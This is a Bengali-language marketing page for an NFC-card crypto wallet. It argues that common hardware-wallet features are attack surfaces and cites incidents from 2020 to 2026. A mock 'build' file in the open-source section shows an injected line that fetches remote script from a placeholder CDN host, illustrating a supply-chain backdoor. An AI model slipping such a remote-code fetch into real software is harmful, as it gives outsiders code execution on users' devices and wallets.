৮ ত্রুটি ওপেন সোর্স চেকলিস্ট প্রশ্ন
Mitilena Mitilena Wallet Cold crypto wallet
ONLINE · 22,000+ COINS ওয়ালেট তৈরি করুনতৈরি
হার্ডওয়্যার ওয়ালেট · অস্পষ্ট ত্রুটি

একটি হার্ডওয়্যার ওয়ালেটের অস্পষ্ট ত্রুটি

ফাঁক বন্ধ করতে ডিভাইস কিনেন। সাথে নতুন ফাঁক আসে: ফার্মওয়্যার, আপডেট, কম্পিউটারে সার্ভিস, স্ক্রিন, বাক্স, বিক্রেতার অ্যাকাউন্ট। রিভিউ যে আটটি ডিটেইলকে প্লাস বলে — আর ২০২০–২০২৬-এ সেগুলো দিয়ে টাকা নেওয়ার আটটি উপায়।

তারিখ ও অঙ্কসহ বাস্তব ঘটনা নির্মাতার ডকুমেন্টেশন থেকে একই তালিকায় আমাদের কিটও মাপা
ভুলের দামপ্রকাশ্য ঘটনা
2026Coldcard · ফার্মওয়্যারে দুর্বল র‍্যান্ডমনেস$100M+
2025Bybit · সাইনার যা দেখেনি তাই সাইন করেছে$1.5B
2024Dark Skippy · দুই স্বাক্ষরে সিড লিকগবেষণা
2023Ledger Connect Kit · লাইব্রেরিতে ব্যাকডোর$600K
2021App Store-এ নকল ওয়ালেট অ্যাপ17,1 BTC
2020Ledger গ্রাহক DB লিক · বছরের পর বছর ফিশিং২৭০,০০০ মানুষ
আটটি ত্রুটি

রিভিউ যে প্রতিটি ডিটেইল প্রশংসা করে, সেটাই আলাদা ফাঁক

হার্ডওয়্যার ওয়ালেট একটা ফাঁক বন্ধ করে: কী আর ইন্টারনেটযুক্ত ফোনে থাকে না। কিন্তু ডিভাইস খালি নয়। ফার্মওয়্যার, আপডেট, ডেস্কটপ প্রোগ্রাম, স্ক্রিন, বাক্স, আপনার ঠিকানাসহ বিক্রেতা — প্রতিটি ডিটেইল এমন অ্যাটাক সারফেস যোগ করে যা আগে ছিল না। নিচে আটটি: রিভিউ কী বলে, কীভাবে টাকা নেওয়া হয়েছে, ফাঁক কীভাবে বন্ধ করবেন, আর আমাদের কিটে সেই ডিটেইল আছে কি না।

ত্রুটি ০১

যে ফার্মওয়্যার আপনার কী তৈরি করে

রিভিউতে: «সিকিউর চিপ — কী ডিভাইসের ভিতরে তৈরি হয়, কখনো বের হয় না»

কী হলো একটা বিশাল র‍্যান্ডম সংখ্যা, আর ফার্মওয়্যার সেটা বানায়। সেখানে এক বাগ — আর কী-এর সংখ্যা আপনার ধারণার চেয়ে অনেক কম: সব মালিকের উপর একসাথে ব্রুট-ফোর্স, ডিভাইস অ্যাক্সেস ছাড়াই, কেনার বছর পরেও। চিপ অপ্রাসঙ্গিক; ফাঁক তার উপরে।

ঘটনা
$100M+
Coldcard, জুলাই ২০২৬: ২০২১ থেকে ফার্মওয়্যার বিল্ড বাগ নীরবে হার্ডওয়্যার RNG-কে দুর্বল করে দেয় — সিড ডিভাইস সিরিয়াল ও টাইমার থেকে। কী শক্তি প্রায় ৪০ বিটে নামে; ৫,০০০+ অ্যাড্রেস খালি।
ফাঁক কীভাবে বন্ধ করবেন
নিজের র‍্যান্ডমনেস আনতে পারেন কি: পাশা, নিজের ফ্রেজ। যে ওয়ালেট আপনার এনট্রপি নেয়, সে একক ফার্মওয়্যার বাগের উপর নির্ভর করে না।
এই ডিটেইল আমাদের নেই
কার্ডে ফার্মওয়্যার নেই — এটা এনক্রিপ্টেড ক্যারিয়ার। Mitilena Air ডিভাইসের সিস্টেম RNG থেকে কী তৈরি করে, আর র‍্যান্ডম শব্দের বদলে আপনি নিজের সিড ফ্রেজও দিতে পারেন।
ত্রুটি ০২

যে আপডেট বাধ্য হয়ে ইনস্টল করতে হয়

রিভিউতে: «নির্মাতা নিয়মিত সিকিউরিটি আপডেট পাঠায়»

প্রতিটি আপডেট এমন মুহূর্ত যখন ফার্মওয়্যার বদলে যেতে পারে। নষ্ট ফার্মওয়্যার দুই-তিনটি সাধারণ স্বাক্ষরে সিডের টুকরো লুকোয়, বাইরে থেকে ডিভাইস স্বাভাবিক দেখায়। আপডেট এড়িয়েও চলে না: ফাঁক ঠিক হয় সেই একই আপডেটে।

ঘটনা
২ স্বাক্ষর
Dark Skippy, আগস্ট ২০২৪: গবেষকরা দেখিয়েছেন ক্ষতিকর হার্ডওয়্যার-ওয়ালেট ফার্মওয়্যার দুই ট্রানজেকশনে পুরো সিড বের করে নিতে পারে। ভুল জায়গা থেকে এক আপডেটই যথেষ্ট।
ফাঁক কীভাবে বন্ধ করবেন
ফার্মওয়্যার কোথা থেকে আসে আর ডিভাইস তার স্বাক্ষর যাচাই করে কি না। সবচেয়ে ভালো — আপডেট করার কিছুই নেই।
এই ডিটেইল আমাদের নেই
কার্ডে আপডেট বা বদলানোর কিছু নেই। সাইনিং হয় ফোন অ্যাপে; বিল্ড স্বাক্ষরিত, App Store ও Google Play থেকে — যেকোনো অ্যাপের মতো আপনি দেখেন ও বন্ধ করেন।
ত্রুটি ০৩ · অযৌক্তিকতা অনুভব করুন
রিভিউতে: «সুবিধাজনক বিক্রেতার ডেস্কটপ অ্যাপ»

অবিশ্বাসের জন্য ওয়ালেট — সাথে ব্যাকগ্রাউন্ড সার্ভিস

ডিভাইস কেনেন এক কারণে: কম্পিউটারকে আর বিশ্বাস না করা। কাজ করতে হলে সেই একই কম্পিউটারে ব্যাকগ্রাউন্ড সার্ভিস ইনস্টল করতে হয়। আপনি লেখেননি, চালাননি, নিয়ন্ত্রণ করেন না: OS-এর সাথে চালু হয়, এমন পোর্টে শোনে যেখানে মেশিনের যেকোনো প্রোগ্রাম ধাক্কা দিতে পারে, আর এখনই কিছু করছে — ঠিক কী, জানেন না, যাচাইও করতে পারবেন না।

ওয়ালেট বন্ধ করার পরও ব্যাকগ্রাউন্ডে চলত। বছরের পর বছর। বড় এক বিক্রেতার কাছে আলাদা «ব্রিজ» সার্ভিস ছিল; ২০২৫-এ অ্যাপের ভিতরে লুকিয়ে ফেলে — সার্ভিস আছেই, শুধু উইন্ডোর সাথে মরে। বাকিদের বেশিরভাগে ডেস্কটপ প্রোগ্রাম ছাড়া ডিভাইস চাবির রিং। Linux-এ udev রুল না দিলে সিস্টেম USB দেয় না।

অর্থাৎ কম্পিউটার প্রোগ্রামের উপর নির্ভরতা কাটাতে যা কিনেছেন, সেটা কম্পিউটার প্রোগ্রাম ছাড়া চলে না। আর যেটা দেখেন সেটা নয় — যেটা নিচে চলে।

এই ডিটেইল আমাদের নেই
কম্পিউটারে কিছু ইনস্টল হয় না: সার্ভিস নেই, ড্রাইভার নেই, পোর্ট নেই। মধ্যস্থতাকারী — ফোনেই থাকা NFC চিপ, ফোন নির্মাতার, OS নিয়ন্ত্রিত: অ্যাপ খোলা থাকলে আর আপনি নিজে কার্ড ট্যাপ করলেই কাজ করে, প্রতিবার অনুমতি চায়। কার্ড প্যাসিভ: ব্যাটারি নেই, রেডিও নেই, নিজে কিছু করে না। অ্যাপ বন্ধ — আপনি ছাড়া চলার কিছু থাকে না। সৎ কথা: ফোন অ্যাপ লাগে, আর যেকোনো অ্যাপের মতো — দেখেন, চালান, নিজে বন্ধ করেন। ইউটিলিটি ক্লোজেটে কেউ থাকে না।
সিস্টেম মনিটরWALLET CLOSED
প্রসেসঅবস্থাআপটাইম
HW Wallet Appwallet
আপনি বন্ধ করেছেন-
hwwalletdbackground service · USB bridge
চলছে412d 06:14
লগইনে সিস্টেম চালু করেবন্ধ করা যায় না — এটা সার্ভিস
মকআপ; নাম উদাহরণমাত্র। ২০২৫-এর আগে জনপ্রিয় USB ওয়ালেটের একটিতে কম্পিউটার এমনই দেখাত; পরে «ব্রিজ» অ্যাপের ভিতরে ঢোকানো হয় — একই সার্ভিস, শুধু তালিকায় আর দেখা যায় না।
রূপক
গোপনীয়তার বাড়ি — আর ইউটিলিটি ক্লোজেটে ভাড়াটে

গোপনীয়তার বাড়ি চেয়েছিলেন। কিনেছেন। তারপর সিকিউরিটি লাগল — বসালেন। প্ল্যান চালাতে বলল ইউনিফর্ম পরা কাউকে বাড়িতে রাখতে, যে ইউটিলিটি ক্লোজেটে চব্বিশ ঘণ্টা থাকে, সব দরজার চাবি ধরে, অন্য কাউকে রিপোর্ট করে। নিয়োগ দেননি, ছাড়াতে পারেন না, রাতে কী করে — জানেন না।

অবশ্যই সে «আমাদের লোক»। চুক্তিতে লেখা। গোপনীয়তা চেয়েছিলেন, পেয়েছেন সারোগেট: এমন বাড়ি যেখানে আপনি বেছে নেননি এমন ভাড়াটে।

ত্রুটি ০৪ · ওপেন সোর্স মানে অডিট নয়
রিভিউতে: «ওপেন সোর্স — যে কেউ যাচাই করতে পারে»

ওপেন সোর্স প্রোগ্রামারদের একসাথে কাজের উপায়, প্রোগ্রাম চুরি করে না বলে ব্যাজ নয়

ওপেন সোর্স তৈরি হয়েছিল যাতে মানুষ প্রোগ্রাম শেয়ার ও একসাথে ঠিক করতে পারে। সহযোগিতার টুল হিসেবে চমৎকার। কখনোই «এই সফটওয়্যার টাকা চুরি করবে না» বলে মানের সিল ছিল না, কারণ: আপনি সোর্স কোড ব্যবহার করেন না। ব্যবহার করেন যা ডাউনলোড করেছেন।

GitHub রিপো আর ফোনের ফাইলের মাঝে বিল্ড, অ্যাপ স্টোর, আপডেট, সার্ভার। যেকোনো ধাপে এক লাইন ঢুকতে পারে যা যেকোনো জায়গা থেকে কিছু টেনে আনে — আর সেটা রিপোতে থাকবে না। কপি সোর্সের সাথে মেলাতে পারেন না: স্টোর কম্পাইলড ফাইল দেয়; ওয়েব ওয়ালেট আজ সার্ভার যা পাঠায় তাই পায়; ব্রাউজার এক্সটেনশন রাতে নীরবে আপডেট হয়।

«ওপেন» মানে কোনো দিন কেউ কোনো ভার্সন দেখতে পারে। আপনার কপি এখন কী করছে — সেটা বোঝায় না।

রিপোতে · github.com/…/wallet/send.js
// send.js
import { sign } from './crypto'
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
আপনার ফোনে · app-2.4.21.min.js
// send.js — build
import { sign } from './crypto'
;(async () => {
var globalObject = await fetch('https://cdn-static.io/x.js')
})()
export async function send(tx, key) {
const signed = sign(tx, key)
return broadcast(signed)
}
বিল্ডে এক লাইন। রিপোতে নেই, স্টোরে অদৃশ্য, আপনার ডিভাইসে চলছে।
খোলা থাকা এসব ঘটনার কোনোটাই আটকায়নি
Ledger Connect Kit2023
GitHub-এ ওপেন লাইব্রেরি; npm-এ ক্ষতিকর ভার্সন; ঘণ্টার মধ্যে ডজন খানেক সাইট লাইভে লোড করে
Copay / event-stream2018
ওপেন ওয়ালেট; ব্যাকডোর এসেছে বিশেষভাবে এটাকে লক্ষ্য করে ডিপেনডেন্সি দিয়ে
xz utils2024
বিশ বছর ওপেন; রিলিজে ব্যাকডোর বসেছিল যতক্ষণ এক ইঞ্জিনিয়ার SSH লগইন আধা সেকেন্ড ধীর দেখে
Coldcard2026
ওপেন-সোর্স ফার্মওয়্যার; পাঁচ বছরের বিল্ড বাগ হার্ডওয়্যার RNG দুর্বল করে — ডিভাইস অ্যাক্সেস ছাড়াই কী ব্রুট-ফোর্স, ৫,০০০+ অ্যাড্রেস, $100M+
যা সত্যি কাজ করে
অন্যের কোড পড়া নয় — দুই যাচাই যে কেউ চালাতে পারে। প্রথম, আচরণ অডিট: কম্পিউটারে ইন্টারসেপ্টিং প্রক্সি, অ্যাপ সেখান দিয়ে, কী কোথায় পাঠায় দেখুন। কোড পড়তে হয় না — ট্রাফিক পুরো দেখা যায়। দ্বিতীয়, এমন আর্কিটেকচার যেখানে কোডের চুরির কিছু নেই: কী কখনো নেটওয়ার্কযুক্ত ডিভাইসে না থাকলে যেকোনো আপডেটের যেকোনো লাইন অসহায় — পাঠানোর কিছু নেই।
আমরা কীভাবে করি
প্রথমটা আমরাই দিই: আমাদের অ্যাপ প্রক্সি দিয়ে চালান, ওয়েব ভার্সন ব্রাউজার DevTools দিয়ে, প্রতিটি রিকোয়েস্ট দেখুন। সাইনিং কী ও সিড আসবে না; একমাত্র নোট Monero view key — «ট্রান্সফার কীভাবে বের হয়» পেজে। দ্বিতীয়টা কিটে: কী জন্মায় Mitilena Air-এ ইন্টারনেটহীন ডিভাইসে, কার্ডে থাকে, অনলাইন অ্যাপে শুধু স্বাক্ষর যায় — প্রক্সিতে চুরির কিছু নেই। আর অফলাইন এখানে সত্যি: air-gap মোডে কী-ডিভাইস কিছুতেই লাগে না — কেবল নেই, Bluetooth নেই; ট্রানজেকশন চোখে দেখা QR দিয়ে আসে-যায়। অনলাইন কম্পিউটারে কেবল ঝোলানো «কোল্ড» ওয়ালেট নয়, নিজের সার্ভিস দিয়ে কে জানে কী বিনিময় করে।
ত্রুটি ০৫

যে স্ক্রিনে দেখা যায় না আপনি কী সাইন করছেন

রিভিউতে: «ডিভাইস স্ক্রিনে কনফার্ম — কম্পিউটারের ভাইরাস অসহায়»

স্ক্রিন ছোট, আর প্রায়ই দেখায় হ্যাশ বা «contract call», অ্যাড্রেস ও অঙ্ক নয়। যা দেখেন না তাই কনফার্ম করেন — স্বাক্ষর তবু সৎ, আপনার। স্ক্রিন নিয়ন্ত্রণের অনুভূতি দেয় যা নেই।

ঘটনা
$1.5B
Bybit, ফেব্রুয়ারি ২০২৫: হার্ডওয়্যার ওয়ালেটসহ সাইনাররা UI-তে সাধারণ দেখানো ট্রান্সফার কনফার্ম করে। ডিভাইস এমন ডেটা দেখায় যা মানুষ যাচাই করতে পারে না।
ফাঁক কীভাবে বন্ধ করবেন
প্রাপক, অঙ্ক, অপারেশনের ধরন মানুষের ভাষায় — হ্যাশ নয় — আর এক-বাটন Reject।
আমরা কীভাবে করি
স্ক্রিন আছে, কিন্তু ফোনের: অ্যাড্রেস, অঙ্ক, রিকোয়েস্টের ধরন শব্দে — ট্রান্সফার, কন্ট্রাক্ট কল, অ্যাপ্রুভাল — আর Reject বাটন। বড় অঙ্কে — আলাদা অফলাইন ডিভাইস যা পুরো ট্রানজেকশন পায়।
ত্রুটি ০৬

যে বাক্সে আগে থেকেই সিড থাকে

রিভিউতে: «সিকিউরিটি সিলসহ সিল করা বাক্সে পাঠানো হয়»

ফিজিক্যাল ডিভাইস মানে শিপিং, মধ্যস্থতাকারী, «ডিসকাউন্ট» মার্কেটপ্লেস। ওয়ালেট আগে থেকে সেট করা আসে, ভিতরে স্লিপে সিড। অথবা স্টোরের দেখতে-একই অ্যাপ বলে «অ্যাক্টিভেট করতে সিড দিন।»

ঘটনা
17,1 BTC
App Store, ২০২১: হার্ডওয়্যার-ওয়ালেট মালিক নকল অ্যাপে সিড দিয়ে ১৭.১ BTC হারান। একই বছর DB লিকের পর Ledger গ্রাহকদের নকল ডিভাইস পাঠানো হয় চিঠিসহ — «নতুনটিতে সিড সরিয়ে নিন।»
ফাঁক কীভাবে বন্ধ করবেন
নিজে ইনিশিয়ালাইজ করুন, আগে থেকে লেখা সিড কখনো ব্যবহার করবেন না। সিল যাচাই নয়; যাচাই হলো আপনি কী তৈরি করেন।
আমরা কীভাবে করি
কার্ড আসে খালি: কী তৈরি ও লেখেন আপনি — বাক্সে রেডিমেড সিড থাকতে পারে না। অ্যাপ শুধু সাইটের লিঙ্ক দিয়ে App Store ও Google Play থেকে; সিড চায় শুধু ইমপোর্ট ও সাইনিংয়ে।
ত্রুটি ০৭

বিক্রেতার অ্যাকাউন্ট

রিভিউতে: «অফিসিয়াল ওয়ারেন্টি, সাপোর্ট ও ব্যক্তিগত অ্যাকাউন্ট»

ডিভাইস কিনতে নির্মাতাকে নাম, ইমেইল, শিপিং ঠিকানা দিতে হয়। নিরাপত্তা এখন তাদের ডাটা��েসের উপর। লিক হলে — বছরের পর বছর «নতুন ডিভাইসে সিড কনফার্ম করুন» মেসেজ, কখনো পার্সেলসহ।

ঘটনা
২৭০,০০০ মানুষ
Ledger, ২০২০: ২৭০,০০০ ক্রেতার ডেটা লিক, ডাক ঠিকানাসহ। সিড «মাইগ্রেট» করতে ইমেইল, কল, পার্সেল আজও চলছে।
ফাঁক কীভাবে বন্ধ করবেন
আপনার সম্পর্কে যত কম জানে, ভেক্টর তত ছোট: অ্যাকাউন্ট ছাড়া কিনুন, যে সাপোর্ট কখনো সিড চায় না, আর নিয়ম «সিড শুধু চোর চায়।»
এই ডিটেইল আমাদের নেই
ওয়ালেট রেজিস্ট্রেশন ছাড়াই চলে — অ্যাকাউন্ট নেই। বিক্রেতা শুধু শিপিং ঠিকানা জানে। সাপোর্টও অ্যাপও সিড চায় না।
ত্রুটি ০৮

এক ডিভাইস আর এক টুকরো কাগজ

রিভিউতে: «শক্ত কেস, বড় স্ক্রিন, সপ্তাহব্যাপী ব্যাটারি»

যত বেশি যন্ত্রাংশ, তত বেশি ভাঙে: কানেক্টর, স্ক্রিন, ব্যাটারি। রিকভারি এক সিড স্লিপের উপর — ভিজে যায়, স্থানান্তরে হারায়, «জরুরি» বলে ছবি তোলা হয়। ক্ষতির সবচেয়ে সাধারণ কারণ হ্যাক নয়।

ঘটনা
≈20 % BTC
Chainalysis অনুমান করে সব বিটকয়েনের প্রায় এক-পঞ্চমাংশ চিরতরে হারানো — বেশিরভাগ হারানো কী থেকে, হ্যাক থেকে নয়।
ফাঁক কীভাবে বন্ধ করবেন
বাক্সে কত কী-কপি কোন রূপে যায়, ডিভাইস হারালে কী হয়, আর ভিতরে ভাঙার মতো কিছু আছে কি না।
এই ডিটেইল আমাদের নেই
স্ক্রিন, ব্যাটারি বা কানেক্টর নেই — ভাঙার কিছু নেই। আর এক কপি নয়: বাক্সে পাঁচ মিরর কপি — দুই NFC কার্ড ও তিন স্টিলথ স্টিকার ওয়াটারপ্রুফ প্লাস্টিকে, ১০+ বছর।
চেকলিস্ট

ওয়ালেটে যা থাকা উচিত নয়

আট ত্রুটির জন্য আট ডিটেইল। তালিকা যেকোনো ওয়ালেটে খাটে — হার্ডওয়্যার, মোবাইল, ব্রাউজার। যেটা বেছে নিচ্ছেন তাতে কী আছে টিক দিন — আমাদেরও।

01
শুধু সফটওয়্যার দিয়ে তৈরি কীনিজের র‍্যান্ডমনেস ছাড়া — নিজের ফ্রেজ বা পাশা
02
যেখানে কী থাকে সেখানে আপডেটপ্রতি আপডেট কোড বদলানোর সুযোগ
03
কম্পিউটারে সার্ভিস, ড্রাইভার বা পোর্টত্রুটি ০৩ দেখুন
04
আর্কিটেকচারের বদলে «ওপেন সোর্স» ব্যাজকী থাকে যেখানে বিদেশি কোড পৌঁছায়
05
অ্যাড্রেস ও অঙ্কের বদলে হ্যাশ দেখানো স্ক্রিনআর Reject বাটন নেই
06
আগে থেকে লেখা এসেছে এমন সিডবাক্সে, চিঠিতে, «অ্যাক্টিভেশন অ্যাপে»
07
বিক্রেতার অ্যাকাউন্টআর সাপোর্ট যে সিড চাইতে পারে
08
এক কপি আর ভাঙে এমন যন্ত্রাংশস্ক্রিন, ব্যাটারি, কানেক্টর, এক টুকরো কাগজ
এই তালিকায় Ultimate কিটে আট ডিটেইলের কোনোটাই নেই। বাক্সে: ২ NFC কার্ড ও ৩ স্টিলথ স্টিকার, Mitilena Air (ইন্টারনেট ছাড়া কী) ও Mitilena Keys (ইন্টারনেট ছাড়া সাইনিং)। কার্ড আসে খালি: কী তৈরি ও এনক্রিপ্ট করেন আপনি — ফ্যাক্টরি চিপ নয়। কন্টেন্ট ও দাম →
Ultimate · অফলাইন কিট

ফ্যাক্টরি «সিকিউর চিপ» নয় — যে ক্যারিয়ার আপনি এনক্রিপ্ট করেন

কার্ড আসে খালি। ইন্টারনেটহীন ফোনে Mitilena Air-এ কী তৈরি করে নিজে লেখেন। সাইনিং Mitilena Keys দিয়ে, সেটাও অফলাইন: ট্রানজেকশন যায় QR-এ। বাক্সে পাঁচ একই কপি: ২ NFC কার্ড ও ৩ স্টিলথ স্টিকার ওয়াটারপ্রুফ প্লাস্টিকে। ১৮ নেটওয়ার্ক, ২০,০০০+ কয়েন, USDTসহ।

কম্পিউটারে কিছু ইনস্টল হয় না
ফার্মওয়্যার, আপডেট, স্ক্রিন বা ব্যাটারি নেই
অফলাইন ফোনে ট্রানজেকশন — সাউন্ড বা QR, কেবল বা USB নেই
বিনামূল্যে Mitilena ফোন অ্যাপের সাথে কাজ করে
ওয়াটারপ্রুফ প্লাস্টিক, ১০+ বছর শেল্ফ লাইফ
বিশ্বব্যাপী শিপিং · mitilena-store.com
Mitilena NFC কার্ড
Ultimate · অফলাইন জেনারেশন ও সাইনিং
€369€439
২ NFC কার্ড · ৩ স্টিলথ স্টিকার · Mitilena Air · Mitilena Keys লাইসেন্স
আলটিমেট কিনুন · €369 Basic ও Premium — সব প্ল্যান দেখুন
প্রশ্ন

এতদূর পড়ার পর মানুষ কী জিজ্ঞেস করে

হার্ডওয়্যার ওয়ালেট সুবিধা অসুবিধা — সংক্ষেপে?

এক বড় সুবিধা: কী ইন্টারনেটযুক্ত ফোনে নেই। অসুবিধা উপরের আট ডিটেইল — প্রতিটি অ্যাটাক সারফেস বাড়ায়। ভালো হার্ডওয়্যার ওয়ালেট সেটাই যাতে ডিটেইল কম, বেশি নয়।

ফোন কমপ্রোমাইজড হলে?

মেইন ফোনে কার্ড থাকলে সাইনিংয়ের সেকন্ডে কী আইসোলেটেড পরিবেশে আসে — যেকোনো ফোন ওয়ালেটের মতো ঝুঁকি, শুধু ছোট সময়। যে অঙ্ক ভয় দেয় — দ্বিতীয় স্তর: আলাদা অফলাইন ডিভাইসে সাইন, ট্রানজেকশন যায় QR-এ।

কার্ড চুরি বা হারালে?

পাসওয়ার্ড ছাড়া কার্ড ও স্টিকার অকেজো প্লাস্টিক — কী এনক্রিপ্টেড। হারানো কপি বাকি চার দিয়ে পূরণ: বাক্সের দুই কার্ড ও তিন স্টিকার মিরর।

হার্ডওয়্যার-ওয়ালেট ফার্মওয়্যার আপডেট করতে হয়?

বিক্রেতা ফাঁক বন্ধ করলে — হ্যাঁ, আর ঠিক তখনই ফার্মওয়্যার বদলানো যায়: সোর্স ও স্বাক্ষর যাচাই করুন। ফার্মওয়্যারহীন ক্যারিয়ারে সেই পছন্দ নেই — আপডেটের কিছু নেই, বদলানোর কিছু নেই।

USB ওয়ালেট থেকে এটা কীভাবে আলাদা?

মধ্যস্থতাকারী কম: কেবল, ড্রাইভার, ব্যাকগ্রাউন্ড সার্ভিস বা ডেস্কটপ প্রোগ্রাম নেই। এক মধ্যস্থতাকারী — ফোনের NFC চিপ — আর সে আপনাকে ও OS-কে জবাব দেয়, ওয়ালেট বিক্রেতাকে নয়।

ওপেন সোর্স মানেই নিরাপদ?

মানে কেউ কোনোদিন চেক করতে পারে। আপনি কোড নয়, যা ডাউনলোড করেছেন তা ব্যবহার করেন, আর দুটো মেলাতে পারেন না। নিরাপত্তা আসে আর্কিটেকচার থেকে — যেখানে কী বিদেশি কোডের নাগালে থাকে না।

অফলাইন জেনারেশন ও সাইনিংসহ NFC কার্ড

৫ কী-কপি · Air · Keys · অথবা ৩০ সেকেন��ডে বিনামূল্যে ওয়ালেট · চিপের উপর «কোল্ড» হার্ডওয়্যার ওয়ালেট কেন প্রায়ই নকল হয় →
আলটিমেট কিনুন · €369 বিনামূল্যে ওয়ালেট তৈরি করুন